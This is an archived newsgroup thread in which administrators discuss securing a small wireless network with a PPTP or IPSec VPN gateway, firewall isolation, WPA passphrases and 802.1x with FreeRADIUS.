securing wireless

We are putting three windows computers on a wireless network. We already
have a wired network in place that is largely maintained by linux routers
and servers. Our primary concern is the security. We don't want anyone
using our wireless network to gain access to our wired network and we want
all communications across the wireless network to be secured. From what
we've seen, enough sniffing on even a WAP secured wireless net and the
security can be cracked.

Our current plan is to CAT5 a linux system with poptop to the wireless hub
and have the windows computers use m$ ppptp to securely create vpn
connections into poptop. The wireless network address range would not be
allowed to route (the rest of the network is on the "other" side of the
linux poptop server). Each of the windows systems would have their
firewalls tightened down to only allow the ppptp traffic to and from the
poptop server, all other traffic on the wireless network would be blocked.
The same goes for the poptop server. Thus the only network that would offer
access to the windows systems would be the vpn net riding on the ppptp.

I did a quick google and came up with this link where it has already been
done: http://www.schumann.cx/wavelan/

I'm just wondering if you guys (which have much more experience than I) have
done anything similar and if so what your experience and recommendations
are.

Thanks!




/dev/null

I've considered doing a similar thing, but AP's supporting 152-bit WEP with
TKIP and 802.1x Security seem like so much less trouble.

Aren't they virtually uncrackable?

I know 64bit WEP is a joke.

The approuch I did is similar... instead pptp I did IPSec but anyway the
concept is the same. I use ASL (www.astaro.com) to be LINUX IPSec (or PPTP
or L2TP) server.

Regards,
Fidelio

"/dev/null" <(E-Mail Removed)> escribió en el mensaje
news:FApFd.3845$P04.520@attbi_s03...
> We are putting three windows computers on a wireless network. We already
> have a wired network in place that is largely maintained by linux routers
> and servers. Our primary concern is the security. We don't want anyone
> using our wireless network to gain access to our wired network and we want
> all communications across the wireless network to be secured. From what
> we've seen, enough sniffing on even a WAP secured wireless net and the
> security can be cracked.
>
> Our current plan is to CAT5 a linux system with poptop to the wireless hub
> and have the windows computers use m$ ppptp to securely create vpn
> connections into poptop. The wireless network address range would not be
> allowed to route (the rest of the network is on the "other" side of the
> linux poptop server). Each of the windows systems would have their
> firewalls tightened down to only allow the ppptp traffic to and from the
> poptop server, all other traffic on the wireless network would be blocked.
> The same goes for the poptop server. Thus the only network that would
offer
> access to the windows systems would be the vpn net riding on the ppptp.
>
> I did a quick google and came up with this link where it has already been
> done: http://www.schumann.cx/wavelan/
>
> I'm just wondering if you guys (which have much more experience than I)
have
> done anything similar and if so what your experience and recommendations
> are.
>
> Thanks!
>
>

Taking a moment's reflection, /dev/null mused:
|
| From what we've seen, enough sniffing on even a WAP secured wireless net
| and the security can be cracked.

You may be mixing up your terms. WAP stands for Wireless Access Point,
and is the physical hardware that wireless clients connect to. This can be
secured with WEP or WPA encryption methods. WEP is the weaker of the two,
and with enough packets sniffed can be cracked easily. WPA, however, fixes
this vulnerability and is infinitely more secure. WPA is, technically,
still vulnerable to dictionary based attacks (where someone attempts to
guess the passphrase), but a long and nonsensical passphrase will generally
protect from these attacks. In other words, don't use "pencil" as your
passphrase. ;-)

"mhicaoidh" <®êmõvé_mhic_aoidh@hotÑîXmailŠPäM.com> wrote in message
news:51yFd.4284$OF5.1420@attbi_s52...
> Taking a moment's reflection, /dev/null mused:
> |
> | From what we've seen, enough sniffing on even a WAP secured wireless net
> | and the security can be cracked.
>
> You may be mixing up your terms. WAP stands for Wireless Access Point,
> and is the physical hardware that wireless clients connect to. This can
> be
> secured with WEP or WPA encryption methods.

Sorry 'WAP' was a typo, I mean WPA. Thanks for catching that

/dev/null wrote:

> I'm just wondering if you guys (which have much more experience than I)
> have done anything similar and if so what your experience and
> recommendations are.

I have my wireless network connected to my firewall system, on it's own NIC,
so that it's outside of my firewall. The only way in, is to use ssh or
vpn. I also use WEP for an added layer of protection.

mhicaoidh wrote:
> You may be mixing up your terms. WAP stands for Wireless Access Point,
> and is the physical hardware that wireless clients connect to. This can be
> secured with WEP or WPA encryption methods. WEP is the weaker of the two,
> and with enough packets sniffed can be cracked easily. WPA, however, fixes
> this vulnerability and is infinitely more secure. WPA is, technically,
> still vulnerable to dictionary based attacks (where someone attempts to
> guess the passphrase), but a long and nonsensical passphrase will generally
> protect from these attacks. In other words, don't use "pencil" as your
> passphrase. ;-)

For a second layer of security you can use a TLS tunnel with a
Freeradius server to authentificate Windows XP supplicants or
Xsupplicant daemons on Linux.

--

Jose Maria Lopez Hernandez
Director Tecnico de bgSEC
(E-Mail Removed)
bgSEC Seguridad y Consultoria de Sistemas Informaticos
http://www.bgsec.com
ESPAÑA

The only people for me are the mad ones -- the ones who are mad to live,
mad to talk, mad to be saved, desirous of everything at the same time,
the ones who never yawn or say a commonplace thing, but burn, burn, burn
like fabulous yellow Roman candles.
-- Jack Kerouac, "On the Road"

James Knott wrote:
> I have my wireless network connected to my firewall system, on it's own NIC,
> so that it's outside of my firewall. The only way in, is to use ssh or
> vpn. I also use WEP for an added layer of protection.

WEP is easily breakable. Firewalls can be fooled, and ssh it's
vulnerable to dictionary attacks. And I am very pessimistic, I know :-)

--

Jose Maria Lopez Hernandez
Director Tecnico de bgSEC
(E-Mail Removed)
bgSEC Seguridad y Consultoria de Sistemas Informaticos
http://www.bgsec.com
ESPAÑA

The only people for me are the mad ones -- the ones who are mad to live,
mad to talk, mad to be saved, desirous of everything at the same time,
the ones who never yawn or say a commonplace thing, but burn, burn, burn
like fabulous yellow Roman candles.
-- Jack Kerouac, "On the Road"

Jose Maria Lopez Hernandez wrote:

> James Knott wrote:
>> I have my wireless network connected to my firewall system, on it's own
>> NIC,
>> so that it's outside of my firewall. The only way in, is to use ssh or
>> vpn. I also use WEP for an added layer of protection.
>
> WEP is easily breakable. Firewalls can be fooled, and ssh it's
> vulnerable to dictionary attacks. And I am very pessimistic, I know :-)
>

Security is never absolute. You add layers, in order to make it too
difficult for an attacker. WEP will stop the casual intruder. The more
determined must then break the vpn or ssh. If they manage to do that, they
still have to find a way to get root access etc.

> Security is never absolute. You add layers, in order to make it too
> difficult for an attacker.

I totally agree.

> WEP will stop the casual intruder. The more
> determined must then break the vpn or ssh.
> If they manage to do that, they
> still have to find a way to get root access etc.

Not for our stuff. The data being transmitted itself is the "prize jewel"
that must be protected. If they can sniff the decrypted real data then
we're in trouble. Of course I don't want them in the box either, but the
data being transmitted is our first concern, and they will be able to see
the data long before they are ever able to get root. So if we stop them
from seeing the data...